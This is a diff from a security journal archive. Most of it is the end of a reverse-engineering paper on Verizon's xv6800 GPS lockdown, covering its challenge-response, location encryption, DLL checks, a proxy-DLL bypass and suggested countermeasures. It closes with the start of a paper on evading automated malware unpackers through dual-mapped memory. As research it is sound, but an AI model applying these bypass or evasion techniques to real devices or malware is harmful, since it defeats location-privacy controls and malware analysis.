secret transform on the given data in order to +create a well-formed response. Until this process is completed, the gpsOne +hardware will not attempt to return a location fix. Furthermore, a +location-enabled application using the built-in gpsOne hardware must +continually complete additional challenge-response sequences (using the same +underlying algorithms) as it continues to acquire updated location fixes from +the gpsOne hardware. + +The first step in connecting to the GPS intermediate driver to retrieve valid +position information is to open a handle to a GPS intermediate driver instance. +This is accomplished with a call to an oemgpsOne.dll export by the name of +oGPSOpenDevice. The parameters and return value of this function are analogous +to the standard Windows Mobile GPSOpenDevice routine [5]. + +HANDLE +oGPSOpenDevice( + __in HANDLE NewLocationData, + __in HANDLE DeviceStateChange, + __in const WCHAR *DeviceName, + __in DWORD Flags + ); + +After a handle to the GPS intermediate driver instance is available, the next +step in preparing for the challenge-response sequence is to issue a call to +a second function implemented by oemgpsOne.dll, named oGPSGetBaseSSD. +This routine returns a session-specific blob of data that is later used in the +challenge-response process. In the current implementation, the returned blob +appears to always contain the same data across every invocation. + +DWORD +oGPSGetBaseSSD( + __in HANDLE Device, + __out unsigned char *Buf, // sizeof = 0x10 + __out unsigned long *BufLength, // 0x10 + __out unsigned short *Buf2 // sizeof = 0x10 + ); + +Next, the GPS intermediate driver must be provided with a valid event handle to +signal when a new challenge cycle has been requested by the driver. This is +accomplished via a call to the oGPSEnableSecurity function in oemgpsOne.dll. + +DWORD +oGPSEnableSecurity( + __in HANDLE Device, + __in HANDLE SecurityChangeEvent + ); + +After the session-specific blob has been retrieved, and an event handle for +new challenge requests has been provided to the GPS intermediate driver, the +next step is to receive a challenge block from the GPS intermediate driver and +compute a valid response. The application must wait until the GPS intermediate +driver signals the challenge request event before requesting the current +challenge data block. Once the driver signals the event that was passed to +oGPSEnableSecurity, the application must execute one challenge-response cycle. + +Challenge data blocks are retrieved from the gpsOne driver via a call to a +routine exported from oemgpsOne.dll, named oGPSReadSecurityConfig. As per the +prototype, this routine takes a handle to the GPS intermediate driver instance, +and returns a blob of data used to generate a challenge response. + +DWORD +oGPSReadSecurityConfig( + __in HANDLE Device, + __out unsigned char *Buf // On return, 0x4 + 1 + 1 + Buf[0x6] (max length 0x1c total) + ); + +After the challenge data blob has been retrieved via a call to +oGPSReadSecurityConfig, the GPS lockdown-aware application must perform a +series of secret transformations on it before indicating a companion response +blob down to the GPS intermediate driver. The transformation function consists +of some bit-shuffling of the challenge blob, followed by a SHA-1 hash of the +shuffled challenge blob concatenated with the session-specific data blob. This +process yields the bulk of the response data less a two-byte header that is +prepended prior to indication down to the GPS intermediate driver. + +The process of sending the computed challenge-response is accomplished via a +call to another function in oemgpsOne.dll, by the name of +oGPSWriteSecurityConfig. + +DWORD +oGPSWriteSecurityConfig( + __in HANDLE Device, + __in unsigned char *Buf // 0x1C + ); + +The GPS intermediate driver will continue to periodically challenge the +application while it requests updated position fixes from the gpsOne chipset. +This is accomplished by signaling the event passed to oGPSEnableSecurity, which +indicates to the application that it should retrieve a new challenge and create +a new response, using the mechanism outlined above. + +2.1.b. Location Information Encryption + +Without passing the challenge-response scheme previously described, the GPS +intermediate driver will refuse to return a set of position information from +the gpsOne hardware. Even after the challenge-response system has been +implemented, however, a secondary layer of security must be addressed. This +security layer takes the form of the encryption of the latitude and longitude +values returned by the gpsOne chipset. + +While this second layer of security may appear superfluous at first glance, +there exists a valid reason for it. Recall that the GPS intermediate driver +multiplexes a single piece of GPS hardware across multiple applications. In +the implementation of the current GPS intermediate driver for the xv6800, the +challenge-response scheme appears to map directly to the gpsOne chipset itself. + +Thus, once a single program has passed the challenge-response mechanism, and as +long as that program continues to respond correctly to challenge-response +requests, any program on the system can call any of the standard Windows Mobile +GPS interfaces to retrieve location data. This presents the obvious security +hole wherein a Verizon Wireless-approved GPS application is started, and then a +third-party application using the standard Windows Mobile GPS API is loaded, +in effect "piggy-backing" on top of the challenge-response code residing in the +approved application to allow access to the embedded gpsOne hardware. + +For reasons unclear to the author, the designers of the GPS lockdown system +did not choose to simply disable GPS requests not associated with the program +that has passed the challenge-response scheme. Instead, a different approach +is taken, such that the GPS intermediate driver encrypts the location +information that it returns via either serial port or gpsapi.dll interfaces. + +In order to make sense of the returned latitude and longitude values, a program +must be able to decrypt them. While the GPS intermediate driver provides the +decryption key in plaintext equivalent to any program that knows how to request +it, this information is not available to clients of the standard Windows Mobile +NMEA-compatible virtual serial port or gpsapi.dll interfaces. Aside from +latitude and longitude data, however, all other information returned by the +standard Windows Mobile GPS interface is unadulterated and valid (this includes +altitude and timing information, primarily). + +Thus, the first step to decoding valid position values is to call an extended +version of the standard Windows Mobile GPSGetPosition routine [6]. This +extended routine is named oGPSGetPosition, and it, too, is implemented in +oemgpsOne.dll. The prototype matches that of the standard GPSGetPosition, +although an extended version of the GPS_POSITION structure containing +additional information (including a blob needed to derive the decryption key +required to decrypt the longitude and latitude values) is returned. + +DWORD +oGPSGetPosition( + __in HANDLE Device, + __out PGPS_POSITION GPSPosition, + __in DWORD MaximumAge, + __in DWORD Flags + ); + +Decryption of the latitude and longitude information is fairly straight- +forward, involving a transform (via the same transformation process described +previously) of the challenge data returned as a part of the extended +GPS_POSITION structure. This yields an AES key, which is imported into a +CryptoAPI key object, and then used in ECB mode to decrypt the latitude and +longitude values. + +Once decryption is complete, a scaling factor is then applied to the resultant +coordinate values, in order to bring them in line with the unit system used by +the standard Windows Mobile GPS interfaces. + +2.2.b. VZ Navigator (Application-level) Protection Mechanisms + +While many parts of the GPS lockdown system are implemented by radio firmware- +level, or kernel mode-level code, portions are also implemented in user mode. +An approved Verizon Wireless application accesses location information by +calling through a module developed by Verizon Wireless and Autodesk, and named +LBSDriver.dll. In an approved application, it is the responsibility of +LBSDriver.dll to communicate with the GPS intermediate driver via +oemgpsOne.dll, and implement the challenge-response and position decryption +functionality. LBSDriver.dll then exports a subset of the standard Windows +Mobile gpsapi.dll (with several custom additions), for usage by approved +programs on the xv6800. + +Additionally, LBSDriver.dll implements a user-controlled privacy policy on top +of the gpsOne hardware. The user is allowed to specify at what times of day a +particular program can access location information, and whether the user is +prompted to confirm the request. The privacy policy configuration process is +driven via a dialog box (implemented and created by LBSDriver.dll) that is +shown on the device the first time an application runs, and subsequently via +a Verizon Wireless-operated web site [7]. Privacy policy settings are +obfuscated and stored in the registry, keyed off of a hash of the calling +program's main process image fully-qualified filename. + +Because LBSDriver.dll is a standard, loadable DLL, it is vulnerable to being +loaded by untrusted code. There are several defenses implemented by the +LBSDriver module which attempt to deter third-party programs that have not been +approved by Verizon Wireless from successfully loading LBSDriver.dll and +subsequently using it to access location information. + +The first such protection embedded into LBSDriver.dll is a digital signature +check on the main process executable corresponding to any program that attempts +to load LBSDriver.dll. This check is ultimately triggered when the +GPSOpenDevice export on LBSDriver.dll is called. Specifically, the calling +process module is confirmed to be signed by a custom certificate. If this is +not the case, then an error dialog is shown, and the GPSOpenDevice request is +denied. This check is based on calling GetModuleFileName(NULL, ...) [8] to +retrieve the path to the main process image, which is then run through the +aforementioned signature check. + +Additionally, LBSDriver.dll also connects to an Autodesk-operated server in +order to determine if the calling program is authorized to use LBSDriver.dll. +In addition to verifying that the calling program is approved as a GPS-enabled +application, the Autodesk-operated server also appears to indicate back to the +client whether or not the user's account has been provisioned for a +subscription location-enabled application, such as VZ Navigator. A program +hoping to utilize LBSDriver.dll must pass these checks in order to successfully +acquire a location fix using the built-in gpsOne hardware. + +The Autodesk-operated server also provides configuration information (such as +Position Determining Entity (PDE) addresses) that is later used in the assisted +GPS process. However, this configuration information appears to be more or +less static, at least for the critical portions necessary to enable assisted +GPS, and can thus be cached and reused by third-party programs without even +needing to go through the Autodesk server. + +3. Opening gpsOne on the xv6800 to Third-party Applications. + +Understanding the protection mechanisms that implement the locking down of the +built-in GPS hardware is only part of the battle to enable third-party +GPS-enabled programs to operate on the xv6800. Undocumented functions in +oemgpsOne.dll with no equivalent in the standard Windows Mobile gpsapi.dll, and +various quirks of Windows Mobile itself preclude a straightforward +implementation to unlock the GPS for third-party programs. + +Furthermore, third-party GPS-enabled programs are written to one (or commonly, +both) of the standard Windows Mobile GPS interfaces. Because these interfaces +are disabled on the xv6800, a solution to adapt third-party programs to the +locked down GPS interface would be required (in lieu of modifying every single +third-party application to support the locked down GPS interface). As many of +these third-party applications are closed-source and frequently updated, any +solution that required direct modification of a third-party program would be +untenable from a maintenance perspective. + +The solution chosen was to write an emulation layer for the standard Windows +Mobile gpsapi.dll interface, which translates standard gpsapi.dll function +calls into requests compatible with the locked down GPS interface. + +3.1. Examining gpsOne Driver Interactions + +The first step in implementing a layer to unlock the gpsOne hardware on the +xv6800 involves discovering the correct sequence of oemgpsOne.dll calls (and +thus calls to the GPS intermediate driver, as oemgpsOne.dll is merely a thin +wrapper around IOCTL requests to the GPS intermediate driver, for the most +part, with some minor exceptions). + +The standard way that this would be done on a Windows-based system would be to +run VZ Navigator under a debugger, but there exist several complications that +prevent this from being an acceptable solution for monitoring oemgpsOne.dll +requests. + +First, the assisted GPS functionality of the gpsOne hardware requires that the +device be connected to the cellular network, and operating with it as the +default gateway, as a connection to a carrier-supplied server (known as a +"Position Determining Entity", or PDE) must be made. The PDE servers that are +operated by Verizon Wireless are firewalled off from outside their network, and +in addition, it is possible that they use the IP address assigned to the user +making a request for location assistance purposes. + +Unfortunately, the debugger connection to a Windows Mobile-based device, for +all the Windows Mobile debuggers that the author had access to (IDA Pro 5.1 and +the Visual Studio 2005 debugger) require an ActiveSync link. While the +ActiveSync link is enabled, it supersedes the cellular link for data traffic. +Even when the computer on the other end of the ActiveSync link was connected to +the cellular network via a separate cellular modem, the GPS functionality did +not operate, due to an apparent check of whether the cellular link is the most- +precedent data link on the device. + +This means that observing much of the oemgpsOne.dll calls relating to position +fixes would not be possible with the standard debugging tools available. The +solution that was implemented for this problem was to write a proxy DLL that +exports every symbol exported by oemgpsOne.dll, logs the parameters of any such +API calls, and then forwards them on to the underlying oemgpsOne.dll +implementation (logging return values and out parameters after the actual +implementation function in question returned). + +While potentially labor-intensive, in terms of creating the proxy DLL, such a +technique is relatively simple on Windows. The usual procedure for such a task +would be to create the proxy DLL, place it in the directory containing the main +process image of the program to be hooked, and then load the real DLL with a +fully-qualified path name from inside the proxy DLL. + +Unfortunately, Windows Mobile does not allow two DLLs with the same base name +to be loaded, even if a fully-qualified path is specified with a call to +LoadLibrary. Instead, the first DLL that happened to get loaded by any process +on the entire system matching the requested base name is returned. This means +that in order to load a proxy DLL, one of two approaches would need to be +taken. + +The first such option is to rename the the proxy DLL itself, along with the +filename of the imported DLL in the desired target module, by modifying the +actual desired target module itself on-disk. The second option is to rename +the DLL containing the implementation of the proxied functionality, and then +load that DLL by the altered name in the proxy DLL. Both approaches are +functionally equivalent on Windows Mobile; the author chose the former in +this case. + +Through disassembly, a rough estimate of the prototypes of the various APIs +exported by oemgpsOne.dll was created, and from there, a proxy module +(oemgpsOneProxy.dll) was written to log specific API calls to a file for later +analysis. This approach allowed for relatively quick identification of any +arguments to oemgpsOne.dll calls which were not immediately obvious from static +disassembly, despite the lack of a debugger on the target when many of the +calls were made. + +3.2. Implementing a Custom oemgpsOne.dll client + +After discerning the prototypes for the various oemgpsOne.dll supporting APIs, +the next step in unlocking the built-in GPS hardware on the xv6800 was to write +a custom client program that utilized oemgpsOne.dll to retrieve decrypted +location values from the gpsOne chipset. + +Although one approach to this task might be to attempt to disable the various +security checks present in LBSDriver.dll, it was deemed easier to re-implement +an oemgpsOne.dll client from scratch. In addition, this approach also allowed +the author to circumvent various implementation bugs and limitations present +in LBSDriver.dll. + +Given the information gleaned from analyzing LBSDriver.dll's implementation of +the challenge-response and GPS decryption logic, and the API call logging from +the oemgpsOne.dll proxy module, writing a client for oemgpsOne.dll is merely an +exercise in writing the necessary code to connect all of the pieces together in +the correct fashion. + +After valid GPS position data can be retrieved from oemgpsOne.dll, all that +remains is to write an adapter layer to connect programs written against the +standard Windows Mobile gpsapi.dll to the custom oemgpsOne.dll client. + +However, there are inherent design limitations in the locked down GPS interface +that complicate the creation of a practical adapter to convert gpsapi.dll calls +into oemgpsOne.dll calls. For example, a naive implementation that might +involve creating a module to replace gpsapi.dll with a custom binary to make +inline calls to oemgpsOne.dll would run aground of a number of pitfalls. + +Specifically, as oemgpsOne.dll depends on gpsapi.dll, attempting to simply +replace gpsapi.dll with a custom module will break the very oemgpsOne.dll +functionality used to communicate with the GPS intermediate driver, due to +the previously mentioned "one dll for a given base name" Windows Mobile +limitation. In addition, it is not possible for two programs to simply +simultaneously operate full clients of oemgpsOne.dll, as the challenge-response +mechanism operates globally and will not operate correctly should two +applications simultaneously attempt to engage it. + +The most straightforward solution to the former issue is to simply rename a +copy of the stock gpsapi.dll, and then modify oemgpsOne.dll to refer to the +renamed gpsapi.dll. This opens the door to replacing the system-supplied +gpsapi.dll with a custom replacement gpsapi.dll implementing a client for +oemgpsOne.dll. + +3.3. Multiplexing GPS Across Multiple Applications. + +The GPS intermediate driver supports multiplexing the GPS hardware present on +a Windows Mobile-based device across multiple applications. However, as +previously noted, the locked down GPS interface breaks this functionality, as +no two programs can participate in the full challenge-response protocol for +keeping the gpsOne hardware active simultaneously. + +Although the first program to start could be designated the "master", and thus +be responsible for challenge-response operations (with secondary programs +merely decrypting position data locally), this introduces a great deal of extra +complexity. Specifically, significant coordination issues arise relating to +cleanly handling the fact that third-party GPS-enabled programs are typically +unaware of each other. Thus, work must be done to handle the case where one +program having previously activated the gpsOne hardware exits, leaving any +remaining programs still using GPS with the problem of selecting a new "master" +program to perform challenge-responses with the GPS intermediate driver. + +Given the difficulties of such an approach, a different model was chosen, such +that the replacement gpsapi.dll acts as a client of a server program which then +mediates access to the locked down GPS interface on behalf of all active GPS- +enabled programs. Although there exist synchronization and coordination issues +with this model, they are simpler to deal with than the alternative +implementation. + +3.4. Caveats. + +While the resultant GPS adapter system supports third-party programs that +utilize gpsapi.dll, any programs using the virtual NMEA serial port interface +will not operate successfully. Unfortunately, the same approach towards the +replacement of gpsapi.dll is not feasible with the APIs utilized in +communication with a serial port, by virtue of the sheer number of function +calls present in coredll.dll that would need to be forwarded on to the real +coredll.dll via a proxy module. + +4. Bugs in the Verizon Wireless xv6800 gpsOne Lock Down Logic + +Few programs designed to lockdown portions of a system via security through +obscurity are bug-free, and the GPS lockdown logic on the xv6800 is certainly +no exception. The lockdown code has a number of localized and systemic issues +pervading the current implementation. + +4.1. Thread Safety Issues + +There are a number of threading related issues present throughout the locked +down GPS interface. + +- The GPS intermediate driver does not properly synchronize the case of + multiple simultaneous callers using the extended IOCTLs not present on a + stock GPS intermediate driver implementation. +- LBSDriver.dll utilizes a dedicated thread for performing challenge-response + processing with the GPS intermediate driver. However, there is no + synchronization provided between the challenge-response thread and the thread + that retrieves and decrypts GPS position data, leading to a race condition in + which it might be possible for decryption to return garbage data. + +4.2. API Mis-use + +In several cases, LBSDriver.dll fails to use standard Windows APIs correctly. + +- LBSDriver.dll performs dangerous operations in DllMain, such as loading + other DLLs, despite such operations being long-documented as blatantly + illegal and prone to difficult to diagnose deadlocks (particularly on a + device with extremely limited debugging support). +- When LBSDriver.dll performs the AES decryption on the latitude/longitude + values returned by oemgpsOne.dll, it creates a CryptoAPI key blob, in order + to import the derived AES key into a CryptoAPI key object (via the use of the + CryptImportKey routine). However, the length of the key blob passed to + CryptImportKey is actually too short. This would appear to make + LBSDriver.dll seemingly dependent on a bug in the Windows Mobile 6 + implementation of CryptoAPI. Specifically, the key blob format for a + symmetric key includes a count in bytes of key material, and the data passed + to CryptImportKey is such that the key blob structure claims to extend beyond + the length of bytes that LBSDriver.dll specifies for the key blob structure + itself. It might even be the case that this represents a security problem in + CryptoAPI due to apparently non-functional length checking in this case, as + key blobs are documented to be transportable across an untrusted medium. + +To illustrate second issue, consider the following code fragment: + +// +// Initialize the header. +// + +BlobHeader = (BLOBHEADER *)KeyBlob; + +BlobHeader->bType = PLAINTEXTKEYBLOB; +BlobHeader->bVersion = 2; +BlobHeader->reserved = 0; +BlobHeader->aiKeyAlg = CALG_AES_128; + +// +// Initialize the key length in the BLOB payload. +// + +*(DWORD *)(&KeyBlob[ 0x08 ] ) = KeyLength; + +// +// Initialize the key material in the BLOB payload. +// + +memcpy( KeyBlob + 0x0C, KeyData, KeyLength ); + +// +// Generate a CryptoAPI AES-128 key object from our key material. +// + +if (!CryptImportKey( + CryptProv, + KeyBlob, + KeyLength, // BUGBUG: Should really be KeyLength + 0x0C... + NULL, + 0, + &Key)) +{ + break; +} + +Contrary to the Microsoft-supplied documentation [9] for CryptImportKey, the +third parameter passed to CryptImportKey ("dwDataLen", as "KeyLength" in this +example) is too short for the key blob specified, as the length field in the +blob header itself describes the key material as being "KeyLength" bytes. +Thus, the LBSDriver.dll module would appear to depend upon either CryptoAPI or +the default Microsoft cryptographic provider on Windows Mobile not validating +blob header key material lengths properly, as the supplied blob header claims +that the key material extends outside the provided blob buffer (given the +length passed to CryptImportKey). + +Microsoft-supplied sample code [10] illustrates the correct construction of a +symmetric key blob, and does not suffer from this deficiency. + +5. Suggested Countermeasures + +Although several attempts were made throughout the GPS lockdown system on the +xv6800 to deter third party programs from successfully communicating with the +integrated gpsOne hardware, the bulk of these checks were relatively easy to +overcome. In fact, the principle barriers to the GPS unlocking projects were +a lack of viable debugging tools for the platform, and an unfamiliarity with +Windows Mobile on the part of the author. + +Nevertheless, several improvements could have been made to improve the +resilience of the lockdown system. + +- Deny assisted GPS availability at the PDE if the user's account is not + provisioned for GPS, or if the privacy policy configured time of day + restrictions are not met. Because the security and lockdown checks are + implemented client-side on the xv6800, they are relatively easily bypassable + by third party applications. However, if the device is capable of performing + a standalone GPS location fix, blocking assisted GPS access will not provide + a hard defense. +- Require code signing from a Verizon Wireless CA for all applications loaded + on the device. Users are, however, unlikely to purchase a device configured + in such a matter, as expensive smartphone-class devices are often sold under + the expectation that third party programs will be easily loadable. +- Moving enforcement checks for operations such as time of day requirements for + the user's desired location privacy policy into the radio firmware and out of + the operating system environment. The radio firmware environment is + significantly closer to a "black box" than the operating system which runs on + the application core of the xv6800. Furthermore, if the software loader on + the xv6800 were secured and locked down, the radio firmware could be made + significantly more proof against unauthorized modifications. One could + envision a system wherein the radio firmware communicates with the carrier's + network out-of-band (with respect to the general-purpose operating system + loaded on the device) to determine when it had been authorized by the user to + provide location information to applications running on the device. + +The client-side checks on the GPS lockdown system are likely a heritage of the +fact that VZ Navigator and LBSDriver.dll appear to be more or less ports from +BREW-based "dumb phones", where the application environment is more tightly +controlled by code signing requirements. The Windows Mobile operating +environment is significantly different in this respect, however. + +Additionally, the author would submit that, from the perspective of attempting +to safeguard users from unauthorized harvesting of their location data (a key +reason cited by Verizon Wireless with respect to the certification process +needed for an application to become approved for location-aware functionality), +a hardware switch to enable or disable the GPS hardware on the device would be +a far better investment. In fact, the xv6800 already possesses a hardware +switch for 802.11 functionality; if this was instead changed to enable or +disable the gpsOne chipset in future smartphone designs, users could be assured +that their location information would be truly secure. + +6. Debugging and Development Challenges on Windows Mobile and the xv6800. + +Windows Mobile has a severely reduced set of standard debugging tools as +compared to the typically highly rich debugging environment available on most +Windows-derived systems. This greatly complicated the process of understanding +the underlying implementation details of the GPS lockdown system. + +The author had access to two debuggers that could be used on the xv6800 at the +time of this writing: the Visual Studio 2005 debugger, and the IDA Pro 5.1 +debugger. Both programs have serious issues in and of their own respective +rights. + +Unfortunately, there does not appear to be any support for WinDbg, the author's +preferred debugging tool, when using Windows CE-based systems, such as Windows +Mobile. Although WinDbg can open ARM dump files (and ARM PE images as a dump +file), and can disassemble ARM instructions, there is no transport to connect +it to a live process on an ARM system. + +The relatively immature state of debugging tools for the Windows Mobile +platform was a significant time consumer in the undertaking of this project. + +6.1. Limitations of the Visual Studio Debugger + +Visual Studio 2005 has integrated support for debugging Windows Mobile-based +applications. However, this support is riddled with bugs, and the quality of +the debugging experience rapidly diminishes if one does not have symbols and +binaries for all images in the process being debugged present on the debugger +machine. In particular, the Visual Studio 2005 debugger seems to be unable to +disassemble at any location other than the current pc register value without +having symbols for the containing binary available. (In the author's +experience, attempting such a feat will fail with a complaint that no code +exists at the desired address.) + +Additionally, there seems to be no support for export symbols on the Windows +Mobile debugger component of Visual Studio 2005. This, coupled with the lack +of freely-targetable disassembly support, often made it difficult to identify +standard API calls from the debugger. The author recommends falling back to +static disassembly whenever possible, as available static disassembly tools, +such as IDA Pro 5.1 Advanced or WinDbg provide a superior user experience. + +6.2. Limitations of the IDA Pro 5.1 Debugger + +Although IDA Pro 5.1 supports debugging of Windows Mobile-based programs, the +debugger has several limitations that made it unfortunately less practical than +the Visual Studio 2005 debugger. Foremost, it would appear that the debugger +does not support suspending and breaking into a Windows Mobile target without +the Windows Mobile target voluntarily breaking in (such as by hitting a +previously defined breakpoint). + +In addition, the default security policy configuration on the device needed to +be modified in order to enable the debugger to connect at all (see note [3]). + +6.3. Replacing a Firmware-baked Execute-in-place Module + +Windows Mobile supports the concept of an execute in place (or XIP) module. +Such an executable image is stored split up into PE sections on disk (and does +not contain a full image header). XIP modules are "baked" into the firmware +image, and cannot be overwritten without flashing the OS firmware on the +device. Conversely, it is not possible to simply copy an XIP module off of the +device and on to a conventional storage medium. + +The advantage of XIP "baked" modules comes into play when one considers the +limited amount of RAM available on a typical Windows Mobile device. XIP +modules are pre-relocated to a guaranteed available base address, and do not +require any runtime alterations to their backing memory when mapped. As a +result, XIP modules can be backed entirely by ROM and not RAM, decreasing the +(scarce) RAM that must be devoted to holding executable code. + +It is possible to supersede an XIP "baked" module without flashing the OS image +on the xv6800, however. This involves a rather convoluted procedure, which +amounts to the following steps, for a given XIP module residing in a particular +directory: + +- First, rename the replacement module such that it has a filename which does + not conflict with any files present in the directory containing the XIP + module to supersede. +- Next, copy the renamed replacement module into the directory containing the + desired XIP module to supersede. +- Finally, rename the replacement module to have the same filename as the + desired XIP module. + +Deleting the filename associated with the superseded XIP module will revert the +device back to the ROM-supplied XIP module. This property proves beneficial in +that it becomes easy to revert back to stock operating system-supplied modules +after temporarily superseding them. + +6.4. Import Address Table Hooking Limitations + +One avenue considered during the development of the replacement gpsapi.dll +module was to hook the import address tables (IATs) of programs utilizing +gpsapi.dll. + +Unfortunately, import table hooking is a significantly more complicated affair +on Windows Mobile-based platforms than on standard Windows. The image headers +for a loaded image are discarded after the image has been mapped, and the IAT +itself is often relocated to be non-contiguous with the rest of the image. + +This relocation is possible as there appears to be an implicit restriction +that all references to an IAT address on ARM PE images must indirect through a +global variable that contains the absolute address of the desired IAT address. +As a result, there are no relative references to the IAT, and thus absolute +address references may be fixed up via the aid of relocation information. It +is not clear to the author what the purpose for this relocation of the IAT +outside the normal image confines serves on Windows Mobile for non-XIP modules +that are loaded into device RAM. + +Furthermore, the HMODULE of an image does not equate to its load base address +on Windows Mobile. One can retrieve the real load base address of a module on +Windows Mobile via the GetModuleInformation API. This is a significant +departure from standard Windows. + +Due to these limitations, the author elected not to pursue IAT hooking for the +purposes of the GPS unlocking project. Although there is code publicly +available to cope with the relocation of an image's IAT, it appears to be +dependent on kernel data structures that the author did not have a conveniently +available and accurate definition for these structures corresponding to the +Windows Mobile kernel shipping on the xv6800. + +7. Conclusion + +Locking down the gpsOne hardware on the xv6800 such that it can only be +utilized by Verizon Wireless certified and approved applications can be seen in +two lights. One could consider such actions an anti-competitive move, designed +to lock out third party programs from having the opportunity to compete with +VZ Navigator. However, such a reasoning is fairly questionable, given that +other carriers in the United States (particularly GSM-based carriers) typically +fully support third party GPS-enabled applications on their devices. As +consumers expect more full-featured and advanced devices, locking down devices +to only carrier-approved functionality is becoming an increasingly large +competitive liability for companies seeking to differentiate their networks +and devices in today's saturated mobile phone markets. + +Furthermore, Verizon Wireless's currently shipping location-enabled application +for the xv6800, VZ Navigator, remains competitive (by virtue of features such +as turn-by-turn voice navigation, traffic awareness, and automatic re-routing) +even if the built-in GPS hardware on the xv6800 were to be unlocked for +general-purpose use. Freely available navigation programs lack these features, +and commercial applications are based off of a different pricing model than the +periodic monthly fee model used by VZ Navigator at the time of this article's +writing. + +A more reasonable (although perhaps misguided) rationale for locking down the +gpsOne hardware is to protect users from having their location harvested or +tracked by malicious programs. Unfortunately, the relatively open nature of +Windows Mobile 6, and a lack of particularly effective privilege-level +isolation on Windows Mobile 6 after any unsigned code is permitted to run both +conspire to greatly diminish the effectiveness of the protection schemes that +are implemented on the xv6800. + +Whether this is a legitimate concern or not remains, of course, up for debate, +but it is clear that the lockdown system as present on the xv6800 is not +particularly effective against blocking access to un-approved third party +applications. + +Future releases of Windows Mobile claim support for a much more effective +privilege isolation model that may provide true security from unprivileged, +malicious programs. However, in currently shipping devices, the operating +system cannot be relied upon to provide this protection. Relying on security +through obscurity to implement lockdown and protection schemes may then seem +attractive, but such mechanisms rarely provide true security. + +As mobile phone advance to becoming more and more powerful devices, in effect +becoming small general-purpose computers, privacy and security concerns begin +to gain greater relevance. With the capability to record a user's location +and audio and environment (via built-in microphones and cameras present on +virtually all modern-day phones), there arises the chance for a serious privacy +breeches, especially given modern day smartphones have historically not seen +the more vigorous level of security review that is slowly becoming more common- +place on general purpose computers. + +One simple and elegant potential solution to these privacy risks is to simply +provide hardware switches to disable sensitive components, such as cameras or +embedded GPS hardware. Keeping in mind with this philosophy, the author would +encourage Verizon Wireless to fully open up their devices, and defer to simple +and secure methods to allow users to manage their sensitive information, such +as physical hardware switches. + + +Bibliography: + +[1] Verizon Wireless. Commercial Location Based Services. + http://www.vzwdevelopers.com/aims/public/menu/lbs/LBSLanding.jsp; accessed October 10, 2008 + +[2] Verizon Wireless. LBS Application Questions ("What can I do to ensure that my application is accepted, and to ensure a smooth certification process?"). + http://www.vzwdevelopers.com/aims/public/menu/lbs/LBSFAQ.jsp#LBSAppQues7; accessed October 10, 2008 + +[3] Daniel Álvarez. Debugging Windows Mobile 6 Applications with IDA. + http://dani.foroselectronica.es/debugging-windows-mobile-6-applications-with-ida-69/; accessed October 10, 2008 + +[4] Microsoft. GPS Intermediate Driver Reference. + http://msdn.microsoft.com/en-us/library/ms850332.aspx; accessed October 10, 2008 + +[5] Microsoft. GPSOpenDevice. + http://msdn.microsoft.com/en-us/library/bb202113.aspx; accessed October 10, 2008 + +[6] Microsoft. GPSGetPosition. + http://msdn.microsoft.com/en-us/library/bb202050.aspx; accessed October 10, 2008 + +[7] Verizon Wireless. LBS Application Questions ("Can the user change their privacy settings?"). + http://www.vzwdevelopers.com/aims/public/menu/lbs/LBSFAQ.jsp#GenQues16; accessed October 10, 2008 + +[8] Microsoft. GetModuleFileName Function (Windows). + http://msdn.microsoft.com/en-us/library/ms683197(VS.85).aspx; accessed October 10, 2008 + +[9] Microsoft. CryptImportKey Function (Windows). + http://msdn.microsoft.com/en-us/library/aa380207(VS.85).aspx; accessed October 11, 2008 + +[10] Microsoft. Example C program: Imprtoing a Plaintext Key (Windows). + http://msdn.microsoft.com/en-us/library/aa382383(VS.85).aspx; accessed October 11, 2008 + diff --git a/uninformed/10.2.txt b/uninformed/10.2.txt new file mode 100644 index 0000000..7df5d97 --- /dev/null +++ b/uninformed/10.2.txt @@ -0,0 +1,231 @@ +Using dual-mappings to evade automated unpackers +10/2008 +skape +mmiller@hick.org + +Abstract: Automated unpackers such as Renovo, Saffron, and Pandora's Bochs +attempt to dynamically unpack executables by detecting the execution of code +from regions of virtual memory that have been written to. While this is an +elegant method of detecting dynamic code execution, it is possible to evade +these unpackers by dual-mapping physical pages to two distinct virtual address +regions where one region is used as an editable mapping and the second region +is used as an executable mapping. In this way, the editable mapping is +written to during the unpacking process and the executable mapping is used to +execute the unpacked code dynamically. This effectively evades automated +unpackers which rely on detecting the execution of code from virtual addresses +that have been written to. + +Update: After publishing this article it was pointed out that the design of +the Justin dynamic unpacking system should invalidate evasion techniques that +assume that the unpacking system will only trap on the first execution attempt +of a page that has been written to. Justin counters this evasion technique +implicitly by enforcing W ^ X such that when a page is executed from for the +first time, it is marked as executable but non-writable. Subsequent write +attempts will cause the page be marked as non-executable and dirty. This +logic is enforced across all virtual addresses that are mapped to the same +physical pages. This has the potential to be an effective countermeasure, +although there are a number of implementation complexities that may make it +difficult to realize in a robust fashion, such as those related to the +duplication of handles and the potential for race conditions when +transitioning page protections. + +1. Background + +There are a number of automated unpackers that rely on detecting the execution +of dynamic code from virtual addresses that has been written to. This section +provides some background on the approaches taken by these unpackers. + +1.1 Malware Normalization + +Christodorescu et al. described a method of normalizing programs which focuses +on eliminating obfuscation[2]. One of the components of this normalization +process consists of an iterative algorithm that is meant to produce a program +that is not self-generating. In essence, this algorithm relies on detecting +dynamic code execution to identify self-generated code. To support this +algorithm, QEMU was used to monitor the execution flow of the input program as +well as all memory writes that occur. If execution is transferred to an +address that has been written to, it is known that dynamic code is being +executed. + +1.2 Renovo + +Renovo is similar to the malware normalization technique in that it uses an +emulated environment to monitor program execution and memory writes to detect +when dynamic code is executed[3]. Renovo makes use of TEMU as the execution +environment for a given program. When Renovo detects the execution of code +from memory that was written to in the context of a given process, it extracts +the dynamic code and attempts to find the original entry point of the unpacked +executable. + +1.3 Saffron + +Saffron uses two approaches to dynamically unpack executables[5]. The first +approach involves using Pin's dynamic instrumentation facilities to monitor +program execution and memory writes in a direction similar to the emulated +approaches described previously. The second approach makes use of hardware +paging features to detect when execution is transferred to a memory region. +Saffron detects the first time code is executed from a page, regardless of +whether or not it is writable, and logs information about the execution to +support extracting the unpacked executable. This can be seen as a more +generic version of the technique used by OllyBonE which focused on using +paging features to monitor a specific subset of the address space[8]. +OmniUnpack also uses an approach that is similar to Saffron[4]. + +1.4 Pandora's Bochs + +Pandora's Bochs uses techniques similar to those used by Christodorescu and +Renovo[1]. Specifically, Pandora's Bochs uses Bochs as an emulation environment +in which to monitor program execution and memory writes to detect when dynamic +code is executed. + +1.5 Justin + +Justin is a recently developed dynamic unpacking system that was presented at 